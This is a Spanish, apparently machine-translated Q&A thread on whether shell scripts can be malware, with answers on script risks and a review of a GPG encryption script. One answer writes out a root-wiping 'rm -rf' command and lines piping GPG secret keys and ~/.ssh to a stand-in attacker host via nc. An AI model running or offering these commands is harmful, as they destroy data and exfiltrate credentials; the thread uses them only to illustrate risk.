¿Puede un archivo .sh ser malware?

15

¿Puede un archivo .sh ser un virus o algo dañino? ¿Es como .exe archivos en Windows? En caso afirmativo, ¿puede alguien leer este script y decirme si es seguro y cómo funciona? en la seguridad GnuPG? Me da la opción de cifrar archivos con un clic derecho en Ubuntu.

    
pregunta rezx 02.06.2012 - 23:39
fuente

5 respuestas

38

Los archivos .sh son scripts de shell . Son análogos a los archivos .bat ( cmd scripts) en Windows. Todos estos (shell scripts, cmd scripts, .exe ejecutables de Windows, ejecutables de Linux (que generalmente no tienen extensión)) son programas ejecutables; Si ejecuta uno, puede hacer cualquier cosa que pueda hacer. Así que sí, los scripts de shell pueden ser perjudiciales. Trate un script de shell (o un script de Perl, un script de Python, un script de Ruby, etc.) con la misma sospecha que trataría con cualquier otra aplicación.

Es un poco más difícil ocultar el malware en un script de shell sin que parezca sospechoso, porque este es un script que puede ser leído por personas con conocimiento del lenguaje de scripting. Pero no es mucho más difícil; pocas personas, incluso con el conocimiento técnico, se molestarán en revisar el código, por lo que puede esperar pasar desapercibido.

Como cuestión práctica, hay menos malware para Linux que flota alrededor de Windows. Probablemente, esto se deba principalmente a que Linux tiene una cuota de mercado mucho menor que Windows en el escritorio, por lo que la recompensa por escribir malware en Linux es menor. Además, existe una cultura arraigada de compartir pequeñas mejoras al sistema en el mundo de Linux, más que en el mundo de Windows; así que el balance de probabilidad dice que se trata de alguien que comparte una pequeña mejora y no de malware. Pero podría ser un malware que se presenta como una pequeña mejora. Al final, debe decidir si puede confiar en el sitio donde está recibiendo esta solicitud o en las personas que lo recomendaron. Favorece los programas que provienen de tu distribución (es decir, que puedes instalar desde el centro de software), ya que han sido revisados.

Ahora, con respecto a este programa específico: le eché un vistazo rápido y parece benigno. No vi nada que pudiera almacenar su contraseña en cualquier lugar sin decirle o que haría cosas en su computadora que no sean las que se anuncian. Tenga en cuenta que solo hice una revisión de 2 minutos, que cualquier escritor de malware inteligente y remoto podría superar. El programa se ve razonablemente bien escrito.

No necesariamente recomendaría este programa a menos que sienta una necesidad apremiante que no esté cubierta por paquetes en la distribución de Ubuntu. Ubuntu viene con el seahorse interfazGUIparaGPG(tambiénhay kgpg parausuariosdeKDE).Tambiénpuedeinstalar seahorse-nautilus (o seahorse -plugin en versiones anteriores) para la integración de Nautilus.

    
respondido por el Gilles 03.06.2012 - 00:06
fuente
8
#!/bin/sh
rm -rf --no-preserve-root /

Eso es malware, y es un script de shell. Una versión más avanzada podría incluir algo como:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

Así que sí, un script de shell puede ser malicioso. Puede ser más complejo y recurrir a otros lenguajes de scripting, bibliotecas, o incluso ser un archivo de shell que escupe y llama a ejecutable regular.

En su mayor parte, cualquier cosa que ejecute obtiene los permisos del usuario.

    
respondido por el Jeff Ferland 04.06.2012 - 22:04
fuente
2

¡Por supuesto! ¡Puede hacer cualquier cosa que usted pueda hacer! Ver registros, hacer keylog, robar archivos, etc ....

¡Dependiendo de lo que su desarrollador haya escrito en el código fuente! Puede hacer NADA .....

Y es muy fácil de hacer, así que si te envían un archivo .sh sospechoso, ¡piénsalo dos veces antes de ejecutarlo!

    
respondido por el ant0nisk 03.06.2012 - 23:52
fuente
2

Un archivo sh puede ser un archivo tradicional que infecta virus:

Ambos artículos incluyen código fuente para virus Sh (más antiguos), aunque uno o ambos tienen un error tipográfico que impide que funcionen correctamente hoy. Es una solución fácil, como recuerdo. Ambos artículos aparecieron a finales, lamentó

Sistemas de computación Volumen 2, Número 2, primavera de 1989

Eso es hace casi 25 años.

En una línea ligeramente diferente, los gusanos de red VAX / VMS Father Xmas y WANK fueron escritos en el lenguaje VMS "shell script", DCL.

    
respondido por el Bruce Ediger 04.06.2012 - 17:54
fuente
1

Un script de shell de Unix puede ser un virus, un gusano, un troyano, un spyware, una bomba lógica

Si un script de shell es ejecutado por una cuenta con privilegios, especialmente root o adm , entonces este script de shell puede causar cualquier tipo de daño. Puede detener el sistema, enviar todo su correo electrónico a cualquier tipo de comando. anfitrión, convierte tu máquina Unix en un arma de denegación de servicio, y mucho peor ...

La mayor parte de este mal comportamiento se descubrirá fácilmente mediante un análisis serio de un script de shell. Por lo tanto, el hecho de que un script de shell sea un arma no permanecerá en secreto.

¿Por qué el script de shell no se usa con más frecuencia para destruir todos los cuadros de Unixes? Simplemente porque sus usuarios no trabajan en su sistema operativo con el mismo nivel de privilegios.

  • La mayoría de los usuarios de Unixes, incluso sysadmin, nunca trabajar en su sistema, incluso su personal, se registra como admin .
  • La mayoría de los usuarios de Windows, Incluso sin sysdamin, siempre trabajan en su sistema, incluso uno profesional, ha iniciado sesión como admin .

Los 2 scripts de shell que propuso utilizar no muestran ningún uso peligroso comandos No hacen ningún tipo de home call , no ocultan ninguno Puerta trasera en el sistema. Pero sí recogen su contraseña de usuario dentro de una variable $PASS para poder usar sudo sin pedir tu contraseña cada vez. Cualquier persona en su sistema podría ver a través del uso correcto de ps argumenta el valor de esta variable de entorno de shell, es decir, su contraseña. Posteriormente, cualquier otro usuario de su sistema puede utilizar su cuenta. y el privilegio aquire root a través de sudo . Por lo tanto, no te aconsejaría que utilices este tipo de script de shell.     
respondido por el daniel Azuelos 03.06.2012 - 01:11
fuente

Lea otras preguntas en las etiquetas